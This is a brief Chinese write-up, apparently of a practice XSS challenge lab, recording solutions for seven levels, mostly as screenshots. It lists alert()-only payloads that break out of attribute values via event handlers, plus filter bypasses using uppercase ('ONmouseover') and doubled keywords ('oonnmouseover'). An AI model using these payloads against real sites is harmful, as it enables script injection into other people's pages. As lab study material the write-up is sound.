XSS闯关记录

文章目录

  • 第一关
  • 第二关--闭合
  • 第三关
  • 第四关太简单了
  • 第五关--过滤了on关键字
  • 第六关--大小写绕过懒的截图
  • 第七关--补充撮合

第一关

XSS闯关记录_第1张图片
没有任何的过滤,直接得到name=
XSS闯关记录_第2张图片

第二关–闭合

发现是在Value里面很简单闭合前面和后面即可,我的一种方案是
"onload="alert();""
XSS闯关记录_第3张图片

第三关

XSS闯关记录_第4张图片
发现没啥用处,最后尝试出'onload="alert(1)

第四关太简单了

XSS闯关记录_第5张图片

" onfocus="alert(/xss/)

第五关–过滤了on关键字

考虑用a标签,666
XSS闯关记录_第6张图片

第六关–大小写绕过懒的截图

" ONmouseover="alert(/xss/)

第七关–补充撮合

XSS闯关记录_第7张图片
" oonnmouseover="alert()

你可能感兴趣的:(安全学习)